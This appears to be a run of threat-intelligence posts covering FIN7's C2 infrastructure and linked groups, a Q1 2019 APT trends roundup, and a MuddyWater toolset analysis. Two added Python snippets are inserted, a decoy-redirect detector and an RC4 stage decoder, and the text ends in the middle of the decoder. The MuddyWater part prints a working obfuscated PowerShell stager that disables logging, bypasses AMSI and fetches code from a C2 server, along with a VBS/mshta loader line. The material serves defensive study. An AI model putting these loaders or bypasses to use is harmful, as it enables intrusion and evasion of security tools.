Attackers make mistakes, and FIN7 are no exception. The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators created fake HTTP 302 redirection to various Google services on their C2s servers.

HTTP/1.1 302 Found
Server: nginx
Date: [retracted]
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Location: https://cloud.google.com/cdn/

Returned headers for most of the GRIFFON C2s servers on port 443

This error allowed us to follow the infrastructure week by week, until an individual published on Twitter the heuristic used to track their C2s at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking of their infrastructure.
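The decoy-redirect pattern above, turned into a threat-hunting check over captured raw HTTP responses. This is an added example, not code from the Kaspersky write-up; the sample responses are constructed (the first transcribed from the headers shown above), and the only redirect destination treated as a decoy is a Google host, since those are the only services the page mentions.

```python
"""Added example (not part of the Kaspersky write-up): parse a captured HTTP
response and test it against the decoy-redirect pattern described above."""
from dataclasses import dataclass, field
from typing import Dict
from urllib.parse import urlsplit

# The page only mentions redirects to Google services, so that is the only
# destination this heuristic treats as a decoy target.
DECOY_TARGET_SUFFIXES = ("google.com",)


@dataclass
class HttpResponse:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)  # lower-cased names


def parse_response(raw: str) -> HttpResponse:
    """Parse the status line and headers of a raw HTTP/1.x response.

    Header names are lower-cased for case-insensitive lookups; the body is
    ignored because the fingerprint only needs the headers.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    if not lines or not lines[0].startswith("HTTP/"):
        raise ValueError("missing HTTP status line")
    parts = lines[0].split(None, 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError("malformed status line: %r" % lines[0])
    headers: Dict[str, str] = {}
    for ln in lines[1:]:
        name, sep, value = ln.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpResponse(int(parts[1]), headers)


def is_griffon_style_decoy(raw: str) -> bool:
    """True when the response is an empty 302 from nginx redirecting to a
    Google service: the pattern the page says most GRIFFON C2s returned."""
    try:
        resp = parse_response(raw)
    except ValueError:
        return False
    if resp.status != 302:
        return False
    if resp.headers.get("content-length", "0") != "0":
        return False
    if not resp.headers.get("server", "").lower().startswith("nginx"):
        return False
    host = (urlsplit(resp.headers.get("location", "")).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in DECOY_TARGET_SUFFIXES)


# Constructed sample, transcribed from the headers shown on the page.
CAPTURED_C2_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: nginx\r\n"
    "Date: [retracted]\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Content-Length: 0\r\n"
    "Connection: keep-alive\r\n"
    "Location: https://cloud.google.com/cdn/\r\n"
    "\r\n"
)

# Constructed benign redirect: same status code, but a real body and a
# destination on the site's own host.
BENIGN_REDIRECT = (
    "HTTP/1.1 302 Found\r\n"
    "Server: nginx\r\n"
    "Content-Length: 154\r\n"
    "Location: https://www.example.com/login\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    print(is_griffon_style_decoy(CAPTURED_C2_RESPONSE))  # True
    print(is_griffon_style_decoy(BENIGN_REDIRECT))       # False
```

As the text notes, the operators changed their landing page in January 2019, so this fingerprint documents the historical behaviour rather than a current one.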

Fake pentest company

During the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.

According to the website, that domain supposedly belongs to a legitimate security company “fully owned by the Russian Government” (sic) with offices in “Moscow, Saint Petersburg and Yekaterinburg”, but the address says the company is located in Trump Tower, in New York. Given FIN7’s previous use of false security companies, we decided to look deeper into this one.

As we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:

  • DKSec – www.dksec.com
  • OKIOK – www.okiok.com/services/tailored-solutions
  • MainNerve – www.mainnerve.com
  • Datics – www.datatics.com/cyber-security
  • Perspective Risk – www.perspectiverisk.com
  • Synack – https://www.synack.com/company
  • FireEye – https://www.fireeye.com/services/penetration-testing.html

This company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.

In addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.

Links to other intrusion sets

While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.


In its history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also PowerShell Empire in order to gain a foothold on the victims’ networks. After a successful penetration, it uses its own backdoors and the CobaltStrike framework or PowerShell Empire components to hop to interesting parts of the network, where it can monetize its access.

FIN7’s last campaigns were targeting banks in Europe and Central America. This threat actor is suspected of stealing €13 million from Bank of Valletta, Malta, earlier this year.

Example of malicious documents used in the end of 2018 to beginning of 2019

A few interesting overlaps in recent FIN7 campaigns:

  • Both used macros to copy wscript.exe to another file whose name began with “ms” (mses.exe for FIN7, msutil.exe for EmpireMonkey).
  • Both executed a JScript file named “error” in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).
  • Both used DocuSign decoy documents with different macros. The macros popped the same “Document decryption error” message, even though the macro code remains entirely different.

We have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.


AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.

To deliver their malware, the cybercriminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. Interestingly, in some emails they ask targets to phone them if they have any questions, as the FIN7 operators do.

Example of AveMaria spearphishing emails. Criminals suggest calling them.

During the investigation into FIN7, our threat-hunting systems found an interesting overlap between the infrastructure of FIN7 and AveMaria. Two servers in the same IP range and the same autonomous system (AS14576) share a non-standard SSH port, 222. One of the servers is a GRIFFON C2, and the other one an AveMaria C2.

Distribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.


At the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity from a previously unknown APT that we temporarily called “CopyPaste”. Interestingly, this actor targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center.

This set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim’s networks and avoid detection.

Here are the main similarities between CopyPaste and FIN7:

  • Both used the same Microsoft PowerShell argument order: “powershell.exe -NoP -NonI -ExecutionPolicy Bypass”. We have only seen FIN7 and CopyPaste use this argument list for executing their malicious PowerShell scripts.
  • Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digicert and Microsoft websites, and CopyPaste used decoy job employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too: FIN7 on its GRIFFON C2s before January 2018, and Cobalt on its staging servers, similar to CopyPaste.
  • Quite recently, FIN7 threat actors typosquatted the brand “Digicert” using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as a Powershell Empire C2 with decoy HTTP 302 redirects to the legitimate Digicert website.

The links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.


During 2018, Europol and the DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader would have an impact on the group’s operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various levels of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.

We link the AveMaria botnet to these two groups with medium confidence: AveMaria’s targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, which targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.

All of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.

FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company “Combi Security”, we are confident that they continue to create new personas for use in either targeting or recruiting under a “new” brand, “IPC”.

More information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Indicators of compromise

AveMaria

In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names.

30 April 2019

APT trends report Q1 2019

For just under two years, the Global Research and Analysis Team (GReAT) at Kaspersky Lab has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

The most remarkable finding

Targeting supply-chains has proved very successful for attackers in recent years – ShadowPad, CCleaner and ExPetr are good examples. In our threat predictions for 2019, we flagged this as a likely continuing attack vector; and we didn’t have to wait very long to see this prediction come true. In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, the mechanism used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers behind “Operation ShadowHammer” added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers were found to have hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist that target different MAC addresses.

Russian-speaking activity

Russian-speaking groups were not especially active during the first part of the year, with no noteworthy technical or operational changes. However, they continued their non-stop activity in terms of spreading, with a special interest in political activity.

This was apparent in an attack focused on the Ukraine elections. The attack surfaced after we discovered a malicious Word document targeting a German political advisory organization. This organization, according to its website, “advises political decision-makers on international politics and foreign and security policy”. Our technical analysis of the attack suggests that the Sofacy or Hades groups are behind it, though we’re unable to say for sure which of these groups is responsible.

Such political interests are not new. Recently, a court in Virginia gave Microsoft control of a group of websites that were intended to look like login sites for a Washington think tank, but are believed to be part of the infrastructure of a “Russian group suspected in the DNC hack”.

Additionally, Microsoft revealed that a “Russian nation-state hacking group” targeted political organizations engaged in the 2019 European Parliament elections scheduled for the end of May.

On the technical side, since mid-January we have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan. This time the actor delivered its known KopiLuwak JavaScript using new .NET malware, called “Topinambour” (aka Sunchoke) by its developers. The Topinambour dropper is delivered along with legitimate software and consists of a tiny .NET shell that waits for Windows shell commands from operators. Interestingly, in this campaign the attackers used different artefacts implemented in JavaScript, .NET and PowerShell – all of them with similar functionality.

We also published details on how Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled, open source language. Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East.

Finally, during February 2019 we observed a highly targeted attack in Crimea using a previously unknown malware. The spy program was spread by email and masqueraded as the VPN-client of a well-known Russian security company that, among other things, provides solutions to protect networks. At this point we can’t relate this activity to any known actor.

Chinese-speaking activity

Recent APT trend summaries included analyses of new Chinese-speaking threat actors as well as the resurgence of old activity sets. This has continued into 2019.

In the early months of 2019, Chinese-speaking actors were the most active, with a traditional interest in targeting different countries in South East Asia. A recent indictment of two Chinese nationals by the US Department of Justice on charges of computer hacking, conspiracy to commit wire fraud and aggravated identity theft, alleged that they were members of the APT10 group, carrying out illegal activity on behalf of the Chinese Ministry of State Security.

Similarly, CactusPete (aka LoneRanger, Karma Panda, and Tonto Team) is reported to have targeted South Korean, Japanese, US, and Taiwanese organizations in the 2012 – 2014 timeframe. The actor has quite likely relied on much the same codebase and implant variants for the past six years. However, these have broadened substantially since 2018. The group spear-phishes its targets, deploys Word and Equation Editor exploits and an appropriated/repackaged DarkHotel VBScript zero-day, delivers modified and compiled unique Mimikatz variants, GSEC and WCE credential stealers, a keylogger, various Escalation of Privilege exploits, various older utilities and an updated set of backdoors, and what appear to be new variants of custom downloader and backdoor modules.

We have been monitoring a campaign targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We attribute the campaign, which we call “SpoiledLegacy”, to the LuckyMouse APT group (aka EmissaryPanda and APT27). The operators use penetration testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network services vulnerabilities as their main initial infection vector, we have also seen spear-phishing messages containing decoy documents. We believe that, as in a previous LuckyMouse campaign, internal database servers are among the targets. For the last stage of their attack they use different in-memory 32- and 64-bit Trojans injected into system process memory. It is worth highlighting that all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code.

FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope, Leviathan and TEMP.Jumper. According to FireEye, the group has conducted operations in support of China’s naval modernisation effort since at least 2013, specifically targeting engineering, transportation and defence industries, especially where these sectors overlap with maritime technologies. Recently, FireEye also observed specific targeting of countries strategically important to the “Belt and Road” Initiative, including Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States and the United Kingdom.

Interestingly, the use of newer ANEL versions by APT10, targeting Japan, allowed us to find similarities between this malware and Emdivi, malware previously used by BlueTermite. This suggests a potential connection between both actors.

South East Asia and Korean peninsula

Once again, this seems to be the most active region of the world in terms of APT activity.

In January, we identified new activity by the Transparent Tribe APT group (aka PROJECTM and MYTHIC LEOPARD), a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets.

In February, we identified a campaign targeting military organizations, this time in India. We are currently unable to attribute this campaign to any known threat actor. The attackers rely on watering-holes and spear-phishing to infect their victims. Specifically, they were able to compromise a website belonging to a think tank related to warfare studies, using it to host a malicious document that distributed a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same time period.

OceanLotus was another actor active during this period, using a new downloader called KerrDown, as reported by Palo Alto. The actor was discovered at the beginning of the year using freshly-compiled samples in a new wave of attacks. ESET recently uncovered a new addition to this actor’s toolset targeting Mac OS.

In mid-2018, our report on “Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges. In this operation, the group used a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities has enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus isn’t the only APT group targeting cryptocurrency exchanges. The Kimsuky group has also extended its activities to include individuals and companies in this sector, mainly in South Korea.

Finally, at the start of the year, the South Asian Bitter group used a new simple downloader (called ArtraDownloader by Palo Alto) that delivers the BitterRat Trojan to target organizations in Saudi Arabia and Pakistan.

Middle East

Surprisingly, during the first months of the year activity in the Middle East has, apparently, been less intense than in the past. Even so, it was the target of several groups already discussed, such as Chafer and Bitter.

We also observed some activity from Gaza Team and MuddyWater. Still, this can be considered part of their continued targeting of the region, showing nothing new in terms of operational or technical improvements.

Other interesting discoveries

Late in 2018 we observed a new version of the FinSpy iOS implant in the wild. This is part of FinSpy Mobile, a product provided by the surveillance solutions developer, Gamma Group. FinSpy for iOS implements extensive spyware features that allow someone to track almost everything on infected devices, including keypresses, messages and calls. A big limitation is that the current version can only be installed on jailbroken devices. We believe that Gamma Group does not provide an exploit tool to jailbreak victims’ phones, but it provides advice and support to customers on how to do the jailbreaking themselves. Our telemetry shows implant traces in Indonesia and Mongolia. However, due to the large number of Gamma customers, this is probably only a fraction of the victims.

Following this research, we discovered a new version for Android also dated circa June 2018. While it is quite similar in terms of functionality, it implements unique capabilities specific to the platform such as obtaining root privileges by abusing the DirtyCow exploit (CVE-2016-5195). Just like the iOS version, this implant has features to exfiltrate data from instant messengers including Threema, Signal, WhatsApp and Telegram, as well as internal device information including, but not limited to, emails and SMS messages.

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have recently discovered using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on 22 February. The company confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on 12 March 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. We believe that this exploit is being used by several threat actors – including, but possibly not limited to, FruityArmor and SandCat. FruityArmor is known to have used zero-days before, while SandCat is a new APT actor that we discovered only recently. The exploit found in the wild was targeting 64-bit operating systems in the Windows 8 to Windows 10 build 15063 range.

FruityArmor and SandCat, interestingly, seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both with such artefacts.

Ransomware has become an interesting tool for APT actors, as it can be used to delete traces, conduct cyber-sabotage, or as a powerful distraction. There is an interesting wave of ransomware attacks that we have been following, as they seem to be mainly interested in big targets. LockerGoga recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins. However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords and removing their ability to log back into the system. In such cases, the victims may not even get to see the ransom note.

Final thoughts

Looking back at what has happened during the first months of the year is always a surprising experience for us. Even when we have the feeling that “nothing groundbreaking” has occurred, we always uncover a threat landscape that is full of many interesting stories and evolution on different fronts.

If we are to provide a few general highlights, we can conclude that:

  • Geopolitics keeps gaining weight as the main driver of APT activity
  • South East Asia is still the most active region of the world in terms of APT activity, but probably this is also related to the “noise” that some of the less experienced groups make
  • Russian-speaking groups keep a low profile in comparison with recent years: maybe this is part of internal restructuring, but this is just a hypothesis
  • Chinese-speaking actors maintain a high level of activity, combining low and high sophistication depending on the campaign
  • Providers of “commercial” malware available for governments and other entities seem to be doing well, with more customers

If we are to highlight one thing from the whole period, in our opinion operation ShadowHammer combines several factors that define the current status of APT activity. This is an advanced and targeted campaign using the supply-chain for distribution on an incredibly wide scale. It involves several steps in a combined operation, including the initial collection of MAC addresses for their targets. This seems to be a new trend, as the actor also targeted other victims for malware distribution, showing how worrisome and difficult it is to fight supply-chain attacks.

As always, this is only our visibility. We always have to keep in mind other sophisticated attacks that happen under our radar, but we continue to try and improve, to uncover every single one of them.

29 April 2019

I know what you did last summer, MuddyWater blending in the crowd


MuddyWater is an APT with a focus on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and also a few other countries in nearby regions (Azerbaijan, Pakistan and Afghanistan).

MuddyWater first surfaced in 2017 and has been active continuously, targeting a large number of organizations. First-stage infections and graphical decoys have been described by multiple sources, including in our previous research, “MuddyWater expands operations”.

Nevertheless, comprehensive details of what happens after the initial infection by MuddyWater have not previously been made publicly available. MuddyWater attackers deploy a variety of tools and techniques, mostly developed by the group itself in Python, C# and PowerShell, to implement their attacks and complete their victim infiltration and data exfiltration. Examples of such tools include multiple download/execute tools and RATs in C# and Python, SSH Python script, multiple Python tools for extraction of credentials, history and more.

This report details a collection of tools used by this threat actor on its targets after initial infection. It also details deceptive techniques used to divert investigations once attack tools have been deployed inside victim systems (such as Chinese strings, Russian strings and impersonation of the “RXR Saudi Arabia” hacking group). The investigation revealed additional OPSEC mistakes by the attackers, but we are not detailing those here due to ongoing law enforcement investigations.

Attackers’ toolset analysis

During our research on MuddyWater campaigns, we were able to identify a number of tools and scripts used by this actor, providing a good understanding of this actor’s abilities. Most of the tools used are custom developed, while others are based on more generic and publicly available ones.

The list includes:

  • Nihay – C# Download-and-Execute tool
  • LisfonService – C# RAT
  • Client.py – Python RAT
  • Client-win.py – SSH Python script
  • Rc.py/Rc.exe – Basic Python RAT
  • VBScript and VBA files
  • Third-party scripts (Muddy, Losi Boomber, Slaver reverse tunnel…)
  • Second stage PowerShell scripts

Most of these tools are scripts written in Python or PowerShell. We noticed that MuddyWater compiles various offensive Python scripts into executables for portability, using Py2Exe and PyInstaller for this task. This includes Python scripts such as “CrackMapExec”, “shootback” and “LaZagne”.

We have also noticed the use of “PS2EXE” to convert PowerShell scripts into executables, with the original PowerShell code embedded as a Base64-encoded string. In other cases, we have noticed a preference for using PowerShell Reflective DLL injection to deploy Metasploit Stageless Meterpreters. They use both 32-Bit and 64-Bit versions. Usually, the Stageless Meterpreter has the “Ext_server_stdapi.x64.dll”, “Ext_server_extapi.x64.dll”, and “Ext_server_espia.x64.dll” extensions.

Nihay – C# Download-and-Execute tool

The tool called “Nihay” (as per its Pdb) is a basic “Download-and-Execute” Trojan written in C#. It downloads a PowerShell one-liner from a hardcoded URL (for instance, https://beepaste[.]io/view/raw/pPCMo1) and passes it to “cmd.exe /c”.

LisfonService – C# RAT

LisfonService is a RAT very similar to the PowerShell RAT that we have analyzed in our previous publication. LisfonService randomly chooses a URL from a huge array of hardcoded Proxy URLs hiding the real C2 server. It collects some basic information about its victim: user name, domain or workgroup name, machine name, machine internal IP address, OS version, OS build and public IP address. Once the victim is successfully registered, a victim id is assigned to the victim and is used later to request commands from the C2, such as executing PowerShell code or causing a Blue Screen.

Inside the decompiled C# code, there is a referenced variable named “str1” that is not actually used. We believe that it is a remnant from an earlier testing phase and it might be the IP address of the C2 behind the Proxy URLs.

str1 = "";

When reaching this URL, it returns a funny chat that the attackers may have left for researchers:

Client.py – Python RAT

Client.Py is a Python 3.6 RAT that we believe was developed by MuddyWater. It is deployed on victim computers as a compiled Python executable using PyInstaller. The execution flow is as follows:

  1. Collects basic information about the victim machine: machine name, OS name, OS version, and user name. It then sends the information to the C2 server at 192.64.86[.]174:8980.
  2. It supports multiple commands, some of them executed by creating a temporary .VBS file and running it with cscript.exe. The supported commands allow the RAT to implement basic keylogger functionality, steal passwords saved in Chrome, kill Task Manager, execute remote commands and display an alert message to the victim in a message box.

Client-win.py – SSH Python script

This PyInstaller-compiled Python script makes use of the Python paramiko library to create an SSH connection to its C2.

  1. Connects to a hard-coded IP address for the C2 (for instance 104.237.233[.]38) on port 8085, sending the string “ip”. It should then receive a list of IPs in the form of “ip1::ip2::ip3”.
  2. The script then connects to the same hard-coded IP address, sending the string “pw”, so that it gets a list of passwords from the C2 in the form of “pw1\npw2\npw3”.
  3. Finally, it tries a list of hard-coded user names (such as ‘cisco’, ‘root’, ‘admin’) with each of the passwords received, on each of the IPs obtained in step 1, to authenticate SSH sessions.

Rc.py/Rc.exe – Basic Python RAT

This UPX-packed executable is a PyInstaller-compiled Python script (rc.py). The script receives the IP address of its C2 as a parameter, connecting to it on the hard-coded port 9095.

This basic RAT supports a few commands on victims’ systems for collecting passwords and remote command execution:

  • “kill” to self-terminate.
  • “cd” for changing the current directory.
  • “dopass” for grabbing credentials from Chrome, IE, Mozilla, Opera and Outlook.
  • “info” extracts basic info about the victim machine: OS name/version, 32-bit/64-bit, processor name, user name, machine name, machine FQDN, internal IP address, MAC address, and public IP address.
  • “shell” receives files from the C2 and saves them in “C:\ProgramData”.
  • “exec” spawns a new process as determined by the C2.
  • Otherwise, cmd.exe /c is called to spawn a new process as determined by the C2. Output is always sent to the C2.

VBScript and VBA files

One of MuddyWater’s preferred infection vectors is the use of weaponized macro-enabled Office 97-2003 Word documents. Its malicious VBA code includes a Base64-encoded payload.

The first file is a malicious VBScript and the second file is the Base64-encoded payload. The VBS calls powershell.exe to Base64-decode the second file and invoke it, as follows:

WScript.CreateObject("WScript.Shell").Run "mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"""",0 ""))",0

This same technique has been seen implemented in several VBScripts seen in the wild, also suspected of being used by this actor.

Third-party scripts

We detected MuddyWater including several “Lazagne”-based scripts in its arsenal. The first one, called Losi Boomber, is used to extract credentials and history from browsers and Outlook.

Losi Boomber command line arguments

Muddy is another Lazagne-based script extracting credentials from mail clients and browsers.

Muddy command line arguments

In this case, it supports the following browsers: Chrome, IE, Mozilla, Opera and Coccoc. In terms of mail clients, it only supports Outlook.

Some embedded imported Python modules

Slaver.py is a compiled Python script taken from “ShootBack”, used for establishing a reverse tcp tunnel.

Slaver command line arguments

Cr.exe is a compiled Python script based on CrackMapExec, used for credential gathering and lateral code execution. Mmap.py (called “MapTools” by MuddyWater) is also based on CrackMapExec and used for the same purpose.

Embedded Imported Python Modules

Second stage PowerShell scripts

We detected MuddyWater making extensive use of PowerShell scripts for different purposes:

Case 1: To fetch the next stage, which is also a PowerShell script:

If($PSVerSIonTAblE.PSVeRSIon.MAJoR -Ge 3){ $GPS=[ReF].AsSemBLy.GEtTYpE('System.Management.Automation.Utils')."GetFiE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static').GeTVAluE($NulL); If($GPS['ScriptB'+'lockLogging']){ $GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; $GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0 }ELsE{ [SCriPTBlOCk]."GetFIe`Ld"('signatures','N'+'onPublic,Static').SETVAlue($NUlL,(NeW-OBJECt ColLECTIOnS.GENERIC.HaShSEt[STrInG])) } [REf].ASsembly.GetTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SeTVALUE($NUll,$tRuE)};}; [SyStEM.NEt.SerVICEPoINtMaNAGeR]::EXPEct100CONTiNuE=0;$K=[SySteM.TExt.EncoDINg]::ASCII.GetBYtES('mdxg_U(,Q3[;~a20DFhrvO+H-NAnKz!V'); $R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256; $H=($H+$S[$I])%256; $S[$I],$S[$H]=$S[$H],$S[$I]; $_-BXOR$S[($S[$I]+$S[$H])%256]}}; $ie=New-Object -COM InternetExplorer.Application; $ie.Silent=$True; $ie.visible=$False; $fl=14; $ser=''; $t='/admin/get.php'; $ie.navigate2($ser+$t,$fl,0,$Null,'CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0='); while($ie.busy){ Start-Sleep -Milliseconds 100}; $ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml; try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null} $iv=$DATA[0..3]; $data=$dATa[4..$DATa.LENGTh]; -joiN[ChaR[]](& $R $DATa ($IV+$K))|IEX

Besides disabling PowerShell Script Block Logging and bypassing AMSI (Anti-Malware Scan Interface), it fetches its next stage using the “InternetExplorer.Application” COM object to retrieve HTML content from http://104.237.233[.]40:7070/admin/get.php. Interestingly, it uses a hard-coded CloudFlare HTTP header value: “CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0=”
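For analysts decoding a captured get.php response, the following is an added example (not from the original report and not the actor's code): it re-implements the obfuscated $R scriptblock as plain RC4 and applies the same layout, a 4-byte IV followed by ciphertext, with the RC4 key being IV + $K. The build_response helper and SAMPLE_STAGE are constructed here purely so the decoder can be exercised offline.

```python
import base64

# Hard-coded $K from the deobfuscated stager quoted above.
KEY = b'mdxg_U(,Q3[;~a20DFhrvO+H-NAnKz!V'


def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); this is exactly what the obfuscated $R scriptblock computes."""
    S = list(range(256))
    j = 0
    for i in range(256):                     # key scheduling: $J=($J+$S[$_]+$K[$_%$K.Count])%256
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                           # keystream + XOR: $_ -bxor $S[($S[$I]+$S[$H])%256]
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def decrypt_stage(body_b64: str, key: bytes = KEY) -> str:
    """Decode a captured server response: base64 -> 4-byte IV || ciphertext.
    The stager decrypts with RC4 under (IV + $K) and pipes the result to IEX."""
    blob = base64.b64decode(body_b64)
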